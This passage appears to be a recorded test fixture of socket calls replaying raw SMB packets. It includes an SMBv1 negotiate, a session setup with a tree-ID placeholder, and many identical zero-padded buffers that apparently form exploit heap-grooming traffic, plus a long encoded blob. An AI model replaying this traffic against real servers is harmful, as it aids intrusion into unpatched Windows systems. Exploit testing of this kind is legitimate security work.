x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xe3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('connect', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00-\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf0\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('connect', 3, 0.0)\", \"('connect', 4, 0.0)\", \"('send', 3, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 5, 0.0)\", \"('send', 4, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 6, 0.0)\", \"('send', 6, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 7, 0.0)\", \"('connect', 8, 0.0)\", \"('send', 7, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 9, 0.0)\", \"('connect', 10, 0.0)\", \"('send', 9, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 11, 0.0)\", \"('connect', 12, 0.0)\", \"('send', 11, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 13, 0.0)\", \"('send', 12, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 14, 0.0)\", \"('send', 13, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 15, 0.0)\", \"('send', 14, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 16, 0.0)\", \"('send', 15, 